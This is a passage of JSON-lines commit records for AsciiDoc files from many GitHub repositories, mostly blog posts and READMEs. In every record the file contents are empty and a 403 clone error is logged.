2015-09-10-Mytitle.adoc","message":"Update 2015-09-10-Mytitle.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Mytitle.adoc","new_file":"_posts\/2015-09-10-Mytitle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a40f2622edd854f3ff3e4262e93bf9f4657136fb","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5518640d46e6b3d8c8e1b93413c4312bbfdbd631","subject":"[DOCS] Added info on WGS-84. Closes issue #3590 (#29305)","message":"[DOCS] Added info on WGS-84. Closes issue #3590 (#29305)\n\n","repos":"uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/mapping\/types\/geo-shape.asciidoc","new_file":"docs\/reference\/mapping\/types\/geo-shape.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5c33b9f995f7f986ac7b6d7f2ee74df18d9497c","subject":"Update 2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","message":"Update 2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","new_file":"_posts\/2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdafd82fcad94fa64c966abbcfea334d645ef25a","subject":"y2b create post Unboxing The Magical RED iPhone 7","message":"y2b create post Unboxing The Magical RED iPhone 7","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-24-Unboxing-The-Magical-RED-iPhone-7.adoc","new_file":"_posts\/2017-03-24-Unboxing-The-Magical-RED-iPhone-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ba9e9075af86a85a3b617f18943bb7cdf0a2f43","subject":"Update 2017-07-07-Episode-106-Drop-It-Like-Its-Hawt.adoc","message":"Update 2017-07-07-Episode-106-Drop-It-Like-Its-Hawt.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-07-07-Episode-106-Drop-It-Like-Its-Hawt.adoc","new_file":"_posts\/2017-07-07-Episode-106-Drop-It-Like-Its-Hawt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"303f1baab19df836fcdd507f89b5f93ea7a2d289","subject":"add action items for security","message":"add action items for security\n","repos":"mygithubwork\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works","old_file":"security.adoc","new_file":"security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30e341a3c740874449efc7b62fc4cf650de14e72","subject":"updated README","message":"updated README\n","repos":"aucampia\/dnspod-int-py","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aucampia\/dnspod-int-py.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98b6f518c6433d5f5c94a8cc1f27397d54e62860","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"598f82614193a27cc1f8105d7e4a112bd2e73b63","subject":"y2b create post This Is NOT Another iPad...","message":"y2b create post This Is NOT Another iPad...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-11-This-Is-NOT-Another-iPad.adoc","new_file":"_posts\/2017-02-11-This-Is-NOT-Another-iPad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cf41883f204bea7654b2d424623a359c6f8bede","subject":"Delete 2018-02-25-3-Cool-Gadgets-Under-$80.adoc","message":"Delete 2018-02-25-3-Cool-Gadgets-Under-$80.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-$80.adoc","new_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-$80.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05632f2de46f65de74c50a8a7e8f6a034031b29a","subject":"Component docs","message":"Component docs\n","repos":"onders86\/camel,cunningt\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,pmoerenhout\/camel,CodeSmell\/camel,gnodet\/camel,dmvolod\/camel,kevinearls\/camel,kevinearls\/camel,DariusX\/camel,CodeSmell\/camel,apache\/camel,jamesnetherton\/camel,Fabryprog\/camel,alvinkwekel\/camel,christophd\/camel,mcollovati\/camel,tadayosi\/camel,pmoerenhout\/camel,apache\/camel,nicolaferraro\/camel,CodeSmell\/camel,adessaigne\/camel,cunningt\/camel,mcollovati\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,DariusX\/camel,DariusX\/camel,adessaigne\/camel,kevinearls\/camel,tadayosi\/camel,onders86\/camel,ullgren\/camel,punkhorn\/camel-upstream,objectiser\/camel,dmvolod\/camel,jamesnetherton\/camel,gnodet\/camel,dmvolod\/camel,christophd\/camel,pax95\/camel,ullgren\/camel,CodeSmell\/camel,dmvolod\/camel,anoordover\/camel,nikhilvibhav\/camel,kevinearls\/camel,jamesnetherton\/camel,Fabryprog\/camel,mcollovati\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,pax95\/camel,davidkarlsen\/camel,objectiser\/camel,alvinkwekel\/camel,jamesnetherton\/camel,pmoerenhout\/camel,nicolaferraro\/camel,pmoerenhout\/camel,tadayosi\/camel,alvinkwekel\/camel,tdiesler\/camel,adessaigne\/camel,DariusX\/camel,jamesnetherton\/camel,kevinearls\/camel,zregvart\/camel,punkhorn\/camel-upstream,dmvolod\/camel,cunningt\/camel,sverkera\/camel,anoordover\/camel,punkhorn\/camel-upstream,apache\/camel,anoordover\/camel,sverkera\/camel,jamesnetherton\/camel,tdiesler\/camel,anoordover\/camel,adessaigne\/camel,gnodet\/camel,onders86\/camel,davidkarlsen\/camel,sverkera\/camel,Fabryprog\/camel,tdiesler\/camel,nicolaferraro\/camel,objectiser\/camel,sverkera\/camel,zregvart\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,christophd\/camel,anoordover\/camel,apache\/camel,davidkarlsen\/camel,alvinkwekel\/camel,sverkera\/camel,cunningt\/camel,pax95\/camel,onders86\/camel,onders86\/camel,christophd\/camel,davidkarlsen\/camel,nicolaferraro\/camel,zregvart\/camel,tdiesler\/camel,kevinearls\/camel,cunningt\/camel,tadayosi\/camel,mcollovati\/camel,christophd\/camel,gnodet\/camel,cunningt\/camel,dmvolod\/camel,anoordover\/camel,ullgren\/camel,ullgren\/camel,pax95\/camel,gnodet\/camel,nikhilvibhav\/camel,tadayosi\/camel,Fabryprog\/camel,tdiesler\/camel,onders86\/camel,nikhilvibhav\/camel,tadayosi\/camel,sverkera\/camel,pax95\/camel,apache\/camel,objectiser\/camel,zregvart\/camel","old_file":"components\/camel-testcontainers-spring\/src\/main\/docs\/testcontainers-spring.adoc","new_file":"components\/camel-testcontainers-spring\/src\/main\/docs\/testcontainers-spring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59d092dc0b0a1597a63e90579e127dd6cf655fc7","subject":"Update 2016-04-12-un-poco-sobre-Metasploit.adoc","message":"Update 2016-04-12-un-poco-sobre-Metasploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-un-poco-sobre-Metasploit.adoc","new_file":"_posts\/2016-04-12-un-poco-sobre-Metasploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee67f19d2151c909d0923723ecb587aa562a6a5a","subject":"Update 2016-11-08-Automate-task-with-Gulp.adoc","message":"Update 2016-11-08-Automate-task-with-Gulp.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2016-11-08-Automate-task-with-Gulp.adoc","new_file":"_posts\/2016-11-08-Automate-task-with-Gulp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c229f06c1b887d8096126edfd8feaaccd537c960","subject":"Update 2018-05-22-All-operations-and-algorithms-on-single-linked-Lists-in-C.adoc","message":"Update 2018-05-22-All-operations-and-algorithms-on-single-linked-Lists-in-C.adoc","repos":"mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io","old_file":"_posts\/2018-05-22-All-operations-and-algorithms-on-single-linked-Lists-in-C.adoc","new_file":"_posts\/2018-05-22-All-operations-and-algorithms-on-single-linked-Lists-in-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkhymohamed\/mkhymohamed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"517f03243a846f4e3bcb22f39d20eb62fdd6df2c","subject":"y2b create post Don't Wait For An iPhone 7 Plus Battery Case","message":"y2b create post Don't Wait For An iPhone 7 Plus Battery Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-29-Dont-Wait-For-An-iPhone-7-Plus-Battery-Case.adoc","new_file":"_posts\/2016-09-29-Dont-Wait-For-An-iPhone-7-Plus-Battery-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c87c0495a6d4008e85f3d3015cfab62f466c61ef","subject":"translating referral module","message":"translating referral module\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/MML4\/doc_e\/referral.adoc","new_file":"doc\/MML4\/doc_e\/referral.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skoba\/mml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51d99107995ff1774bec715e1277a8f6b3fcec9c","subject":"y2b create post The World's Coolest Desk?","message":"y2b create post The World's Coolest Desk?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-21-The-Worlds-Coolest-Desk.adoc","new_file":"_posts\/2013-05-21-The-Worlds-Coolest-Desk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c7ff7faeaf46c158913147569bf9e4be23e13e2","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0affe23d85b710aef781f16da422d161f2c3000b","subject":"Update 2020-02-12-wonder.adoc","message":"Update 2020-02-12-wonder.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-02-12-wonder.adoc","new_file":"_posts\/2020-02-12-wonder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20d7c6c90fe4b5af9cf00ce9e7aafaf8c24ceb12","subject":"Update 2015-05-01-Hello.adoc","message":"Update 2015-05-01-Hello.adoc","repos":"sebbrousse\/sebbrousse.github.io,sebbrousse\/sebbrousse.github.io,sebbrousse\/sebbrousse.github.io,sebbrousse\/sebbrousse.github.io","old_file":"_posts\/2015-05-01-Hello.adoc","new_file":"_posts\/2015-05-01-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebbrousse\/sebbrousse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28ec33b031265fbc3473c4b86b712a5e50f957ca","subject":"Update 2016-07-20-vimer.adoc","message":"Update 2016-07-20-vimer.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vimer.adoc","new_file":"_posts\/2016-07-20-vimer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9efb8e915f03ad9fbf79fe307563d84ed17b21e1","subject":"Update 2015-03-03-0100-LHebergement.adoc","message":"Update 2015-03-03-0100-LHebergement.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-03-0100-LHebergement.adoc","new_file":"_posts\/2015-03-03-0100-LHebergement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9608dfe8d3b87daf1a9cc86c7e5d14bac55b928b","subject":"Update 2018-08-29-Lover.adoc","message":"Update 2018-08-29-Lover.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-08-29-Lover.adoc","new_file":"_posts\/2018-08-29-Lover.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0897ac5579ea20d9492c9ad4d9861336b81d8ce3","subject":"Update 2018-10-09-E-K-S.adoc","message":"Update 2018-10-09-E-K-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-09-E-K-S.adoc","new_file":"_posts\/2018-10-09-E-K-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2e0a71d14616dc38d4c44ae03fb16217f1a5296","subject":"Update 2016-06-10-programming-study.adoc","message":"Update 2016-06-10-programming-study.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-programming-study.adoc","new_file":"_posts\/2016-06-10-programming-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71683eca416255b0ad2c9202d67913b9b7a6385f","subject":"Renamed '_posts\/2017-08-19-Sony-WH-1000X-M-review.adoc' to '_posts\/2017-11-19-Sony-WH-1000X-M-review.adoc'","message":"Renamed '_posts\/2017-08-19-Sony-WH-1000X-M-review.adoc' to '_posts\/2017-11-19-Sony-WH-1000X-M-review.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-19-Sony-WH-1000X-M-review.adoc","new_file":"_posts\/2017-11-19-Sony-WH-1000X-M-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9525d7db2bc1f4f8e5c8930c84f353df7b06ff49","subject":"Update 2015-10-12-Designing-for-Advocacy.adoc","message":"Update 2015-10-12-Designing-for-Advocacy.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-Designing-for-Advocacy.adoc","new_file":"_posts\/2015-10-12-Designing-for-Advocacy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e6ba214d5472c7be45a4947d7945ec0c5325af7","subject":"Made readme an adoc and added comment about disabling shadow build in qt.","message":"Made readme an adoc and added comment about disabling shadow build in qt.\n","repos":"UCSolarCarTeam\/Epsilon-Hermes,UCSolarCarTeam\/Epsilon-Hermes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Epsilon-Hermes.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"8e0212c867b6360fd4d37c35a7b72fbe5f4b4310","subject":"`README` is outdated","message":"`README` is outdated\n\n* Mark as done `Address books`;\n* Move the date of internal beta from Apr'17 to May'17;\n* Move the date of public beta from May'17 to July'17.\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cb7c6c6a85e9c08723bba165f9f20e66b93fc596","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"031653946ffcd435b0db0456eb1055a1c334422f","subject":"Update 2010-09-02-Signer-les-JA-R-avec-maven.adoc","message":"Update 2010-09-02-Signer-les-JA-R-avec-maven.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-09-02-Signer-les-JA-R-avec-maven.adoc","new_file":"_posts\/2010-09-02-Signer-les-JA-R-avec-maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac4dc3a8e7786fb16801663cd9064fde2968c798","subject":"Update 2014-12-03-Stack-safe-recursion-in-Java.adoc","message":"Update 2014-12-03-Stack-safe-recursion-in-Java.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2014-12-03-Stack-safe-recursion-in-Java.adoc","new_file":"_posts\/2014-12-03-Stack-safe-recursion-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0722b1e55dfd0c9fc369612e2700188b9ed7bb1","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09592bf5967f1439862597032af0fc159390a231","subject":"Readme formatting adjustment","message":"Readme formatting adjustment\n","repos":"cocagne\/paxos,tempbottle\/paxos-2,tempbottle\/paxos-2,cocagne\/paxos","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tempbottle\/paxos-2.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e0ed09320d0f301a68334e3e19dd0161a1b5244","subject":"Added README.asciidoc, with a brief instruction and link to article.","message":"Added README.asciidoc, with a brief instruction and link to article.\n","repos":"jav\/six-one-router,jav\/six-one-router","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jav\/six-one-router.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"5a650d4cf08d373e7f4219f6e59c3b7c5d64249d","subject":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","message":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf45cfa5de88ff4d2733536c49c9953f04a04933","subject":"[TAMAYA-258] Added notice document how to run PIT.","message":"[TAMAYA-258] Added notice document how to run PIT.\n","repos":"apache\/incubator-tamaya,apache\/incubator-tamaya,apache\/incubator-tamaya","old_file":"running-mutation-tests.adoc","new_file":"running-mutation-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f8b2523502c87964272b3def4e0a0c7249d804ed","subject":"Update 2017-02-17-Building-a-Linux-Devbox.adoc","message":"Update 2017-02-17-Building-a-Linux-Devbox.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-02-17-Building-a-Linux-Devbox.adoc","new_file":"_posts\/2017-02-17-Building-a-Linux-Devbox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"376fdc238cafeebf996a9ae23e8a1de625a0c538","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f2d82df9c9077b97b4c979ca9686106325d597f","subject":"Update 2017-01-17-Test-Post-Please-Ignore.adoc","message":"Update 2017-01-17-Test-Post-Please-Ignore.adoc","repos":"CreditCardsCom\/creditcardscom.github.io,CreditCardsCom\/creditcardscom.github.io,CreditCardsCom\/creditcardscom.github.io,CreditCardsCom\/creditcardscom.github.io","old_file":"_posts\/2017-01-17-Test-Post-Please-Ignore.adoc","new_file":"_posts\/2017-01-17-Test-Post-Please-Ignore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CreditCardsCom\/creditcardscom.github.io.git\/': 